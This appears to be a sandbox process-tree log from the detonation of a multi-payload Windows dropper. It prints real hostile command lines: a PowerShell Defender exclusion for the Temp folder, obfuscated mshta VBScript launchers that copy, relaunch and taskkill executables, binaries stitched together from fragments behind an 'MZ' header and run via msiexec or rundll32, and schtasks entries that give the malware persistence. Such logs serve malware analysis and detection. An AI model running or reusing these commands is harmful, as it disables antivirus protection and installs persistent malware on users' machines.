C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1607c6ec89.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1607c6ec89.exeTue1607c6ec89.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1607c6ec89.exeC:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1607c6ec89.exe6⤵
- Executes dropped EXE
PID:5052
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1693c6e21a84f1.exe4⤵PID:2236
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1693c6e21a84f1.exeTue1693c6e21a84f1.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3904 -
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1693c6e21a84f1.exeC:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1693c6e21a84f1.exe6⤵PID:2556
-
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1693c6e21a84f1.exeC:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1693c6e21a84f1.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2400
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue16752f37c10e89.exe /mixone4⤵PID:2508
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16752f37c10e89.exeTue16752f37c10e89.exe /mixone5⤵
- Executes dropped EXE
PID:1304 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 3006⤵
- Program crash
PID:1264
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue16937a015b8e.exe4⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16937a015b8e.exeTue16937a015b8e.exe5⤵
- Executes dropped EXE
PID:4064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue169b8ca3fff9b96f8.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue169b8ca3fff9b96f8.exeTue169b8ca3fff9b96f8.exe5⤵
- Executes dropped EXE
PID:3192 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 2406⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5232
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue166a21bf15ecf0.exe4⤵PID:3716
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue166a21bf15ecf0.exeTue166a21bf15ecf0.exe5⤵
- Executes dropped EXE
PID:1172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue161bd708d12e5.exe4⤵PID:4360
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue161bd708d12e5.exeTue161bd708d12e5.exe5⤵
- Executes dropped EXE
PID:2988 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl").run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue161bd708d12e5.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If """" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue161bd708d12e5.exe"" ) do taskkill -F /iM ""%~nXE"" ", 0, True ) )6⤵PID:4984
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue161bd708d12e5.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "" =="" for %E In ( "C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue161bd708d12e5.exe" ) do taskkill -F /iM "%~nXE"7⤵PID:3312
-
C:\Users\Admin\AppData\Local\Temp\fkKCS.exefkKCS.EXE -P_3FA3g8_0NB8⤵
- Executes dropped EXE
PID:2536 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl").run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If ""-P_3FA3g8_0NB "" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"" ) do taskkill -F /iM ""%~nXE"" ", 0, True ) )9⤵
- Executes dropped EXE
PID:2556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "-P_3FA3g8_0NB " =="" for %E In ( "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe" ) do taskkill -F /iM "%~nXE"10⤵PID:2584
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: ClOSE( cREaTEOBjEcT ("wSCript.sheLl").RUN ( "Cmd.eXE /c echo N%TIme%O>VPZp.II & EChO | set /p = ""MZ"" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+LAQIL0YY.POg + vCTGFFAM.2ST + ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS " ,0 , TRUe ) )9⤵PID:6044
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /iM "Tue161bd708d12e5.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1695d07d02bff8ff.exe4⤵PID:4388
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue1695d07d02bff8ff.exeTue1695d07d02bff8ff.exe5⤵
- Executes dropped EXE
PID:2752 -
C:\Users\Admin\Pictures\Adobe Films\e_irO0_3R6Rf9GgjVi0_oXWl.exe"C:\Users\Admin\Pictures\Adobe Films\e_irO0_3R6Rf9GgjVi0_oXWl.exe"6⤵
- Executes dropped EXE
PID:2428
-
-
C:\Users\Admin\Pictures\Adobe Films\RJwzwL5KMuWQjArNCsoUoy9D.exe"C:\Users\Admin\Pictures\Adobe Films\RJwzwL5KMuWQjArNCsoUoy9D.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5692
-
-
C:\Users\Admin\Pictures\Adobe Films\uafVdwKyHT5gPne18wT5RnX4.exe"C:\Users\Admin\Pictures\Adobe Films\uafVdwKyHT5gPne18wT5RnX4.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5656 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5244
-
-
-
C:\Users\Admin\Pictures\Adobe Films\3GsuTLMCUrLvXLXPiblSrtkE.exe"C:\Users\Admin\Pictures\Adobe Films\3GsuTLMCUrLvXLXPiblSrtkE.exe"6⤵
- Executes dropped EXE
PID:5640
-
-
C:\Users\Admin\Pictures\Adobe Films\rZ7ocUkNDU0jxOPMfMVuMaW7.exe"C:\Users\Admin\Pictures\Adobe Films\rZ7ocUkNDU0jxOPMfMVuMaW7.exe"6⤵
- Executes dropped EXE
PID:5632
-
-
C:\Users\Admin\Pictures\Adobe Films\hBYVkgzfvd8h0hZgEHfZ6oEa.exe"C:\Users\Admin\Pictures\Adobe Films\hBYVkgzfvd8h0hZgEHfZ6oEa.exe"6⤵
- Executes dropped EXE
PID:5620
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue165ec2d1de4f1ae98.exe4⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue165ec2d1de4f1ae98.exeTue165ec2d1de4f1ae98.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 19326⤵
- Program crash
PID:1276
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3392 -s 6444⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1604aa7d34a61a5b.exe4⤵PID:3188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1647cedf7bf133.exe4⤵PID:2704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue162f02d7b75a1d.exe4⤵PID:2168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue16497809b6bd.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue160598ce8b05.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS879905C3\Tue16497809b6bd.exeTue16497809b6bd.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3204 -
C:\Users\Admin\Pictures\Adobe Films\bg_ugflVLgnyjdYexFwscoBP.exe"C:\Users\Admin\Pictures\Adobe Films\bg_ugflVLgnyjdYexFwscoBP.exe"2⤵
- Executes dropped EXE
PID:2012
-
-
C:\Users\Admin\Pictures\Adobe Films\MgizT9j68bTrUhE8vbFwjxRi.exe"C:\Users\Admin\Pictures\Adobe Films\MgizT9j68bTrUhE8vbFwjxRi.exe"2⤵
- Executes dropped EXE
PID:5600 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 2963⤵
- Program crash
PID:6092
-
-
-
C:\Users\Admin\Pictures\Adobe Films\3eluNx1mt7j4BZpZ1U0qpptt.exe"C:\Users\Admin\Pictures\Adobe Films\3eluNx1mt7j4BZpZ1U0qpptt.exe"2⤵
- Executes dropped EXE
PID:5720 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 2923⤵
- Program crash
PID:976
-
-
-
C:\Users\Admin\Pictures\Adobe Films\XKpP1q8iPJVAjqogv7ILKaft.exe"C:\Users\Admin\Pictures\Adobe Films\XKpP1q8iPJVAjqogv7ILKaft.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5672
-
-
C:\Users\Admin\Pictures\Adobe Films\QwOBJYTdYE3XjXInE_VvxlBs.exe"C:\Users\Admin\Pictures\Adobe Films\QwOBJYTdYE3XjXInE_VvxlBs.exe"2⤵
- Executes dropped EXE
PID:5648 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 2283⤵
- Program crash
PID:2608
-
-
-
C:\Users\Admin\Pictures\Adobe Films\awhaFF5dYihHOJjYYvSy1f4Y.exe"C:\Users\Admin\Pictures\Adobe Films\awhaFF5dYihHOJjYYvSy1f4Y.exe"2⤵
- Executes dropped EXE
PID:5784 -
C:\Users\Admin\Pictures\Adobe Films\awhaFF5dYihHOJjYYvSy1f4Y.exe"C:\Users\Admin\Pictures\Adobe Films\awhaFF5dYihHOJjYYvSy1f4Y.exe"3⤵PID:1560
-
-
-
C:\Users\Admin\Pictures\Adobe Films\07yTnXbxqaDTuklt6GljNxGL.exe"C:\Users\Admin\Pictures\Adobe Films\07yTnXbxqaDTuklt6GljNxGL.exe"2⤵
- Executes dropped EXE
PID:5808
-
-
C:\Users\Admin\Pictures\Adobe Films\8KowEmYAHlW3pmz2nDd7ZaO1.exe"C:\Users\Admin\Pictures\Adobe Films\8KowEmYAHlW3pmz2nDd7ZaO1.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:5584
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe"C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe"2⤵
- Executes dropped EXE
PID:5912 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵PID:5980
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\ezLMa4B4NXobtlOIKECpsSEn.exe" ) do taskkill -im "%~NxK" -F4⤵PID:6120
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "ezLMa4B4NXobtlOIKECpsSEn.exe" -F5⤵
- Kills process with taskkill
PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵PID:1604
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵PID:4392
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵PID:4784
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵PID:4392
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵PID:5744
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵PID:2764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵PID:904
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵PID:1456
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9dSxL26zom9nRGj4S4rDilqe.exe"C:\Users\Admin\Pictures\Adobe Films\9dSxL26zom9nRGj4S4rDilqe.exe"2⤵PID:5284
-
-
C:\Users\Admin\Pictures\Adobe Films\HaFItDQfZWeGlrCdh4kFMt_6.exe"C:\Users\Admin\Pictures\Adobe Films\HaFItDQfZWeGlrCdh4kFMt_6.exe"2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5208 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 3003⤵
- Program crash
PID:6052
-
-
-
C:\Users\Admin\Pictures\Adobe Films\pZ5q56NQj2GGYaLgGyiYKxts.exe"C:\Users\Admin\Pictures\Adobe Films\pZ5q56NQj2GGYaLgGyiYKxts.exe"2⤵PID:5220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 3003⤵
- Program crash
PID:2008
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gjjvU6R_viWIc1nqnJmEWNRa.exe"C:\Users\Admin\Pictures\Adobe Films\gjjvU6R_viWIc1nqnJmEWNRa.exe"2⤵PID:1720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 2803⤵
- Program crash
PID:3076
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cSZInNKlSzsbBmfI69OKmwXg.exe"C:\Users\Admin\Pictures\Adobe Films\cSZInNKlSzsbBmfI69OKmwXg.exe"2⤵PID:5372
-
-
C:\Users\Admin\Pictures\Adobe Films\CThsTPW_sflx4Kq1AX4HaO3v.exe"C:\Users\Admin\Pictures\Adobe Films\CThsTPW_sflx4Kq1AX4HaO3v.exe"2⤵PID:5196
-
C:\Users\Admin\AppData\Roaming\8763962.exe"C:\Users\Admin\AppData\Roaming\8763962.exe"3⤵PID:1912
-
-
C:\Users\Admin\AppData\Roaming\5891499.exe"C:\Users\Admin\AppData\Roaming\5891499.exe"3⤵PID:6068
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:3348
-
-
-
C:\Users\Admin\AppData\Roaming\5019877.exe"C:\Users\Admin\AppData\Roaming\5019877.exe"3⤵PID:2864
-
-
C:\Users\Admin\AppData\Roaming\1078971.exe"C:\Users\Admin\AppData\Roaming\1078971.exe"3⤵PID:5236
-
-
C:\Users\Admin\AppData\Roaming\520799.exe"C:\Users\Admin\AppData\Roaming\520799.exe"3⤵PID:5908
-
-
C:\Users\Admin\AppData\Roaming\4098947.exe"C:\Users\Admin\AppData\Roaming\4098947.exe"3⤵PID:4640
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\4098947.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\4098947.exe"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )4⤵PID:5844
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\4098947.exe"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\4098947.exe" ) do taskkill /F /Im "%~Nxk"5⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXEkStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ6⤵PID:1588
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )7⤵PID:856
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"8⤵PID:5496
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH& CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )7⤵PID:6800
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V>8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH& CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU +wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM8⤵PID:7100
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"9⤵PID:7140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "9⤵PID:7076
-
-
C:\Windows\SysWOW64\control.execontrol .\GKq1GTV.ZnM9⤵PID:6740
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM10⤵PID:5496
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /Im "4098947.exe"6⤵
- Loads dropped DLL
- Kills process with taskkill
PID:5124
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\373783.exe"C:\Users\Admin\AppData\Roaming\373783.exe"3⤵PID:5028
-
-
-
C:\Users\Admin\Pictures\Adobe Films\E4R79LhS_MmimlyrHIGdKU2M.exe"C:\Users\Admin\Pictures\Adobe Films\E4R79LhS_MmimlyrHIGdKU2M.exe"2⤵PID:5048
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:5984
-
-
C:\Users\Admin\Documents\OwanO0eJ8QmVp3i6Ghi6D7vc.exe"C:\Users\Admin\Documents\OwanO0eJ8QmVp3i6Ghi6D7vc.exe"3⤵PID:6128
-
C:\Users\Admin\Pictures\Adobe Films\N8p4ZgMLFVX0Un4r9ujtoi9X.exe"C:\Users\Admin\Pictures\Adobe Films\N8p4ZgMLFVX0Un4r9ujtoi9X.exe"4⤵PID:5376
-
-
C:\Users\Admin\Pictures\Adobe Films\s_bdn_qB2Ya36YzceiUp6bu9.exe"C:\Users\Admin\Pictures\Adobe Films\s_bdn_qB2Ya36YzceiUp6bu9.exe"4⤵PID:4488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 3005⤵
- Program crash
PID:7008
-
-
-
C:\Users\Admin\Pictures\Adobe Films\AWWAyU6XwqoPjXTH30K6qRzo.exe"C:\Users\Admin\Pictures\Adobe Films\AWWAyU6XwqoPjXTH30K6qRzo.exe"4⤵PID:4032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 17605⤵
- Program crash
PID:7056
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7_cJWtvuRAq9CI2uGLE5O324.exe"C:\Users\Admin\Pictures\Adobe Films\7_cJWtvuRAq9CI2uGLE5O324.exe"4⤵PID:1904
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 3005⤵
- Program crash
PID:7128
-
-
-
C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe"C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe"4⤵PID:1188
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵PID:4360
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe" ) do taskkill -f -iM "%~NxM"6⤵PID:3056
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "bIz1Pmnq1K0Nc4CfDF7pT7Gq.exe"7⤵
- Kills process with taskkill
PID:7020
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵PID:6980
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:4812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:856
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IG5frkHi5RGsSZrcxdVx9F83.exe"C:\Users\Admin\Pictures\Adobe Films\IG5frkHi5RGsSZrcxdVx9F83.exe"4⤵PID:2716
-
-
C:\Users\Admin\Pictures\Adobe Films\0reQRE7C3J6St5HAWmTFUdpb.exe"C:\Users\Admin\Pictures\Adobe Films\0reQRE7C3J6St5HAWmTFUdpb.exe"4⤵PID:3940
-
C:\Users\Admin\Pictures\Adobe Films\0reQRE7C3J6St5HAWmTFUdpb.exe"C:\Users\Admin\Pictures\Adobe Films\0reQRE7C3J6St5HAWmTFUdpb.exe" -u5⤵PID:6968
-
-
-
